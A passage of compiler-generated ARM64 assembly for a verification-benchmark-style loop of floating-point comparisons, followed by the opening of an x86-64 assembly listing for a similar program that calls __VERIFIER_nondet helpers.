fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-14.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_375
b LBB1_374
LBB1_374: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-104]
fcvt d2, s0
ldur s0, [x29, #-60]
fcvt d0, s0
fmov d1, #-1.00000000
fmadd d0, d1, d0, d2
fcmp d0, d1
cset w8, ne
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_375
LBB1_375: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #104]
fcvt d2, s0
ldr s0, [sp, #100]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-8.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_376
LBB1_376: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-56]
fcvt d2, s0
ldr s0, [sp, #100]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-12.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_377
LBB1_377: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #120]
fcvt d2, s0
ldr s0, [sp, #100]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-4.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_378
LBB1_378: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-72]
fcvt d2, s0
ldr s0, [sp, #100]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-8.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_379
LBB1_379: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #128]
fcvt d2, s0
ldr s0, [sp, #100]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-20.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_380
LBB1_380: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #144]
fcvt d2, s0
ldr s0, [sp, #100]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-6.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_381
LBB1_381: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #152]
fcvt d2, s0
ldr s0, [sp, #100]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-4.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_382
LBB1_382: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-88]
fcvt d2, s0
ldr s0, [sp, #100]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-17.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_383
LBB1_383: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-112]
fcvt d2, s0
ldr s0, [sp, #100]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-10.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_384
LBB1_384: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-104]
fcvt d2, s0
ldr s0, [sp, #100]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-20.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_385
LBB1_385: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #104]
fcvt d2, s0
ldr s0, [sp, #100]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-8.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_395
b LBB1_386
LBB1_386: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-56]
fcvt d2, s0
ldr s0, [sp, #100]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-12.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_395
b LBB1_387
LBB1_387: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #120]
fcvt d2, s0
ldr s0, [sp, #100]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-4.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_395
b LBB1_388
LBB1_388: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-72]
fcvt d2, s0
ldr s0, [sp, #100]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-8.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_395
b LBB1_389
LBB1_389: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #128]
fcvt d2, s0
ldr s0, [sp, #100]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-20.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_395
b LBB1_390
LBB1_390: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #144]
fcvt d2, s0
ldr s0, [sp, #100]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-6.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_395
b LBB1_391
LBB1_391: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #152]
fcvt d2, s0
ldr s0, [sp, #100]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-4.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_395
b LBB1_392
LBB1_392: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-88]
fcvt d2, s0
ldr s0, [sp, #100]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-17.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_395
b LBB1_393
LBB1_393: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-112]
fcvt d2, s0
ldr s0, [sp, #100]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-10.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_395
b LBB1_394
LBB1_394: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-104]
fcvt d2, s0
ldr s0, [sp, #100]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-20.00000000
fcmp d0, d1
cset w8, ne
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_395
LBB1_395: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #104]
fcvt d2, s0
ldr s0, [sp, #108]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-7.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_396
LBB1_396: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-48]
fcvt d2, s0
ldr s0, [sp, #108]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-19.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_397
LBB1_397: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #120]
fcvt d2, s0
ldr s0, [sp, #108]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-2.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_398
LBB1_398: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #128]
fcvt d2, s0
ldr s0, [sp, #108]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-8.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_399
LBB1_399: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #144]
fcvt d2, s0
ldr s0, [sp, #108]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-17.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_400
LBB1_400: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #152]
fcvt d2, s0
ldr s0, [sp, #108]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-15.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_401
LBB1_401: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-136]
fcvt d2, s0
ldr s0, [sp, #108]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-13.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_402
LBB1_402: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-88]
fcvt d2, s0
ldr s0, [sp, #108]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-15.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_403
LBB1_403: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-112]
fcvt d2, s0
ldr s0, [sp, #108]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-5.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_404
LBB1_404: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-104]
fcvt d2, s0
ldr s0, [sp, #108]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-7.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_405
LBB1_405: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #104]
fcvt d2, s0
ldr s0, [sp, #108]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-7.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_415
b LBB1_406
LBB1_406: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-48]
fcvt d2, s0
ldr s0, [sp, #108]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-19.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_415
b LBB1_407
LBB1_407: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #120]
fcvt d2, s0
ldr s0, [sp, #108]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-2.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_415
b LBB1_408
LBB1_408: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #128]
fcvt d2, s0
ldr s0, [sp, #108]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-8.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_415
b LBB1_409
LBB1_409: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #144]
fcvt d2, s0
ldr s0, [sp, #108]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-17.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_415
b LBB1_410
LBB1_410: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #152]
fcvt d2, s0
ldr s0, [sp, #108]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-15.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_415
b LBB1_411
LBB1_411: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-136]
fcvt d2, s0
ldr s0, [sp, #108]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-13.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_415
b LBB1_412
LBB1_412: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-88]
fcvt d2, s0
ldr s0, [sp, #108]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-15.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_415
b LBB1_413
LBB1_413: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-112]
fcvt d2, s0
ldr s0, [sp, #108]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-5.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_415
b LBB1_414
LBB1_414: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-104]
fcvt d2, s0
ldr s0, [sp, #108]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-7.00000000
fcmp d0, d1
cset w8, ne
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_415
LBB1_415: ; in Loop: Header=BB1_8 Depth=1
ldur w8, [x29, #-40]
str w8, [sp, #68] ; 4-byte Folded Spill
ldur w8, [x29, #-44]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_417
b LBB1_416
LBB1_416: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-76]
fcvt d2, s0
ldur s0, [x29, #-52]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-17.00000000
fcmp d0, d1
cset w8, ls
mov w9, #1
str w9, [sp, #64] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_418
b LBB1_417
LBB1_417: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-92]
fcvt d2, s0
ldur s0, [x29, #-84]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d1, d0, d1, d2
fmov d0, #-7.00000000
fcmp d0, d1
cset w8, ls
str w8, [sp, #64] ; 4-byte Folded Spill
b LBB1_418
LBB1_418: ; in Loop: Header=BB1_8 Depth=1
ldr w8, [sp, #68] ; 4-byte Folded Reload
ldr w9, [sp, #64] ; 4-byte Folded Reload
and w9, w9, #0x1
subs w8, w8, w9
cset w8, ne
mov w9, #0
str w9, [sp, #60] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_453
b LBB1_419
LBB1_419: ; in Loop: Header=BB1_8 Depth=1
ldur w8, [x29, #-96]
str w8, [sp, #52] ; 4-byte Folded Spill
ldur s0, [x29, #-76]
fcvt d2, s0
ldur s0, [x29, #-52]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-17.00000000
fcmp d0, d1
cset w8, ls
mov w9, #1
str w9, [sp, #56] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_426
b LBB1_420
LBB1_420: ; in Loop: Header=BB1_8 Depth=1
ldur w8, [x29, #-100]
subs w8, w8, #0
cset w8, eq
mov w9, #0
str w9, [sp, #48] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_425
b LBB1_421
LBB1_421: ; in Loop: Header=BB1_8 Depth=1
ldur w8, [x29, #-44]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_423
b LBB1_422
LBB1_422: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-76]
fcvt d2, s0
ldur s0, [x29, #-52]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-17.00000000
fcmp d0, d1
cset w8, ls
mov w9, #1
str w9, [sp, #44] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_424
b LBB1_423
LBB1_423: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-92]
fcvt d2, s0
ldur s0, [x29, #-84]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d1, d0, d1, d2
fmov d0, #-7.00000000
fcmp d0, d1
cset w8, ls
str w8, [sp, #44] ; 4-byte Folded Spill
b LBB1_424
LBB1_424: ; in Loop: Header=BB1_8 Depth=1
ldr w8, [sp, #44] ; 4-byte Folded Reload
str w8, [sp, #48] ; 4-byte Folded Spill
b LBB1_425
LBB1_425: ; in Loop: Header=BB1_8 Depth=1
ldr w8, [sp, #48] ; 4-byte Folded Reload
str w8, [sp, #56] ; 4-byte Folded Spill
b LBB1_426
LBB1_426: ; in Loop: Header=BB1_8 Depth=1
ldr w8, [sp, #52] ; 4-byte Folded Reload
ldr w9, [sp, #56] ; 4-byte Folded Reload
and w9, w9, #0x1
subs w8, w8, w9
cset w8, ne
mov w9, #0
str w9, [sp, #60] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_453
b LBB1_427
LBB1_427: ; in Loop: Header=BB1_8 Depth=1
ldur w8, [x29, #-36]
str w8, [sp, #40] ; 4-byte Folded Spill
ldur w8, [x29, #-32]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_429
b LBB1_428
LBB1_428: ; in Loop: Header=BB1_8 Depth=1
ldur w8, [x29, #-24]
subs w8, w8, #0
cset w8, ne
mov w9, #0
str w9, [sp, #36] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_438
b LBB1_429
LBB1_429: ; in Loop: Header=BB1_8 Depth=1
ldur w8, [x29, #-32]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_431
b LBB1_430
LBB1_430: ; in Loop: Header=BB1_8 Depth=1
ldur w8, [x29, #-24]
subs w8, w8, #0
cset w8, ne
mov w9, #1
str w9, [sp, #32] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_437
b LBB1_431
LBB1_431: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-88]
fcvt d2, s0
ldur s0, [x29, #-80]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d1, d0, d1, d2
fmov d0, #-7.00000000
fcmp d0, d1
cset w8, ls
mov w9, #1
str w9, [sp, #28] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_436
b LBB1_432
LBB1_432: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-88]
fcvt d2, s0
ldur s0, [x29, #-80]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d1, d0, d1, d2
fmov d0, #-7.00000000
fcmp d0, d1
cset w8, ls
tbnz w8, #0, LBB1_435
b LBB1_433
LBB1_433: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-72]
fcvt d2, s0
ldur s0, [x29, #-48]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-17.00000000
fcmp d0, d1
cset w8, hi
mov w9, #1
str w9, [sp, #28] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_436
b LBB1_434
LBB1_434: ; in Loop: Header=BB1_8 Depth=1
ldur w8, [x29, #-40]
subs w8, w8, #0
cset w8, eq
mov w9, #1
str w9, [sp, #28] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_436
b LBB1_435
LBB1_435: ; in Loop: Header=BB1_8 Depth=1
ldur w8, [x29, #-32]
subs w8, w8, #0
cset w8, ne
str w8, [sp, #28] ; 4-byte Folded Spill
b LBB1_436
LBB1_436: ; in Loop: Header=BB1_8 Depth=1
ldr w8, [sp, #28] ; 4-byte Folded Reload
str w8, [sp, #32] ; 4-byte Folded Spill
b LBB1_437
LBB1_437: ; in Loop: Header=BB1_8 Depth=1
ldr w8, [sp, #32] ; 4-byte Folded Reload
str w8, [sp, #36] ; 4-byte Folded Spill
b LBB1_438
LBB1_438: ; in Loop: Header=BB1_8 Depth=1
ldr w8, [sp, #40] ; 4-byte Folded Reload
ldr w9, [sp, #36] ; 4-byte Folded Reload
and w9, w9, #0x1
subs w8, w8, w9
cset w8, ne
mov w9, #0
str w9, [sp, #60] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_453
b LBB1_439
LBB1_439: ; in Loop: Header=BB1_8 Depth=1
ldur w8, [x29, #-28]
str w8, [sp, #24] ; 4-byte Folded Spill
ldur w8, [x29, #-32]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_441
b LBB1_440
LBB1_440: ; in Loop: Header=BB1_8 Depth=1
ldur w8, [x29, #-24]
subs w8, w8, #0
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_452
b LBB1_441
LBB1_441: ; in Loop: Header=BB1_8 Depth=1
ldur w8, [x29, #-32]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_443
b LBB1_442
LBB1_442: ; in Loop: Header=BB1_8 Depth=1
ldur w8, [x29, #-24]
subs w8, w8, #0
cset w8, ne
mov w9, #1
str w9, [sp, #16] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_451
b LBB1_443
LBB1_443: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-72]
fcvt d2, s0
ldur s0, [x29, #-48]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-17.00000000
fcmp d0, d1
cset w8, ls
mov w9, #1
str w9, [sp, #12] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_450
b LBB1_444
LBB1_444: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-72]
fcvt d2, s0
ldur s0, [x29, #-48]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-17.00000000
fcmp d0, d1
cset w8, ls
tbnz w8, #0, LBB1_449
b LBB1_445
LBB1_445: ; in Loop: Header=BB1_8 Depth=1
ldur w8, [x29, #-96]
subs w8, w8, #0
cset w8, eq
mov w9, #1
str w9, [sp, #12] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_450
b LBB1_446
LBB1_446: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-88]
fcvt d2, s0
ldur s0, [x29, #-80]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d1, d0, d1, d2
fmov d0, #-7.00000000
fcmp d0, d1
cset w8, ls
tbnz w8, #0, LBB1_449
b LBB1_447
LBB1_447: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-72]
fcvt d2, s0
ldur s0, [x29, #-48]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-17.00000000
fcmp d0, d1
cset w8, hi
mov w9, #1
str w9, [sp, #12] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_450
b LBB1_448
LBB1_448: ; in Loop: Header=BB1_8 Depth=1
ldur w8, [x29, #-40]
subs w8, w8, #0
cset w8, eq
mov w9, #1
str w9, [sp, #12] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_450
b LBB1_449
LBB1_449: ; in Loop: Header=BB1_8 Depth=1
ldur w8, [x29, #-24]
subs w8, w8, #0
cset w8, ne
str w8, [sp, #12] ; 4-byte Folded Spill
b LBB1_450
LBB1_450: ; in Loop: Header=BB1_8 Depth=1
ldr w8, [sp, #12] ; 4-byte Folded Reload
str w8, [sp, #16] ; 4-byte Folded Spill
b LBB1_451
LBB1_451: ; in Loop: Header=BB1_8 Depth=1
ldr w8, [sp, #16] ; 4-byte Folded Reload
str w8, [sp, #20] ; 4-byte Folded Spill
b LBB1_452
LBB1_452: ; in Loop: Header=BB1_8 Depth=1
ldr w8, [sp, #24] ; 4-byte Folded Reload
ldr w9, [sp, #20] ; 4-byte Folded Reload
and w9, w9, #0x1
subs w8, w8, w9
cset w8, eq
str w8, [sp, #60] ; 4-byte Folded Spill
b LBB1_453
LBB1_453: ; in Loop: Header=BB1_8 Depth=1
ldr w8, [sp, #60] ; 4-byte Folded Reload
str w8, [sp, #72] ; 4-byte Folded Spill
b LBB1_454
LBB1_454: ; in Loop: Header=BB1_8 Depth=1
ldr w8, [sp, #72] ; 4-byte Folded Reload
and w8, w8, #0x1
str w8, [sp, #84]
ldur w8, [x29, #-28]
stur w8, [x29, #-24]
ldur w8, [x29, #-36]
stur w8, [x29, #-32]
ldur w8, [x29, #-44]
stur w8, [x29, #-40]
ldur s0, [x29, #-52]
stur s0, [x29, #-48]
ldur s0, [x29, #-60]
stur s0, [x29, #-56]
ldur s0, [x29, #-68]
stur s0, [x29, #-64]
ldur s0, [x29, #-76]
stur s0, [x29, #-72]
ldur s0, [x29, #-84]
stur s0, [x29, #-80]
ldur s0, [x29, #-92]
stur s0, [x29, #-88]
ldur w8, [x29, #-100]
stur w8, [x29, #-96]
ldur s0, [x29, #-108]
stur s0, [x29, #-104]
ldur s0, [x29, #-116]
stur s0, [x29, #-112]
ldur s0, [x29, #-124]
stur s0, [x29, #-120]
ldur s0, [x29, #-132]
stur s0, [x29, #-128]
ldur s0, [x29, #-140]
stur s0, [x29, #-136]
ldur s0, [x29, #-148]
stur s0, [x29, #-144]
ldr s0, [sp, #148]
str s0, [sp, #152]
ldr s0, [sp, #140]
str s0, [sp, #144]
ldr s0, [sp, #132]
str s0, [sp, #136]
ldr s0, [sp, #124]
str s0, [sp, #128]
ldr s0, [sp, #116]
str s0, [sp, #120]
ldr s0, [sp, #108]
str s0, [sp, #112]
ldr s0, [sp, #100]
str s0, [sp, #104]
ldr s0, [sp, #92]
str s0, [sp, #96]
b LBB1_8
LBB1_455:
ldur w0, [x29, #-20]
ldp x29, x30, [sp, #304] ; 16-byte Folded Reload
ldp x28, x27, [sp, #288] ; 16-byte Folded Reload
add sp, sp, #320
ret
.cfi_endproc
; -- End function
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl ___VERIFIER_nondet_bool ## -- Begin function __VERIFIER_nondet_bool
.p2align 4, 0x90
___VERIFIER_nondet_bool: ## @__VERIFIER_nondet_bool
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
callq ___VERIFIER_nondet_int
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %eax
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__literal8,8byte_literals
.p2align 3 ## -- Begin function main
LCPI1_0:
.quad 0xc031000000000000 ## double -17
LCPI1_1:
.quad 0xc01c000000000000 ## double -7
LCPI1_2:
.quad 0xc014000000000000 ## double -5
LCPI1_3:
.quad 0xc024000000000000 ## double -10
LCPI1_4:
.quad 0xc033000000000000 ## double -19
LCPI1_5:
.quad 0xc02e000000000000 ## double -15
LCPI1_6:
.quad 0xc000000000000000 ## double -2
LCPI1_7:
.quad 0xc034000000000000 ## double -20
LCPI1_8:
.quad 0xc030000000000000 ## double -16
LCPI1_9:
.quad 0xc010000000000000 ## double -4
LCPI1_10:
.quad 0xc020000000000000 ## double -8
LCPI1_11:
.quad 0xc026000000000000 ## double -11
LCPI1_12:
.quad 0xc032000000000000 ## double -18
LCPI1_13:
.quad 0xc02a000000000000 ## double -13
LCPI1_14:
.quad 0xc028000000000000 ## double -12
LCPI1_15:
.quad 0xc02c000000000000 ## double -14
LCPI1_16:
.quad 0xc018000000000000 ## double -6
LCPI1_17:
.quad 0xbff0000000000000 ## double -1
LCPI1_18:
.quad 0xc022000000000000 ## double -9
LCPI1_19:
.quad 0xc008000000000000 ## double -3
.section __TEXT,__text,regular,pure_instructions
.globl _main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $240, %rsp
movl $0, -4(%rbp)
callq ___VERIFIER_nondet_int
movl %eax, -200(%rbp)
callq ___VERIFIER_nondet_bool
movl %eax, -8(%rbp)
callq ___VERIFIER_nondet_bool
movl %eax, -16(%rbp)
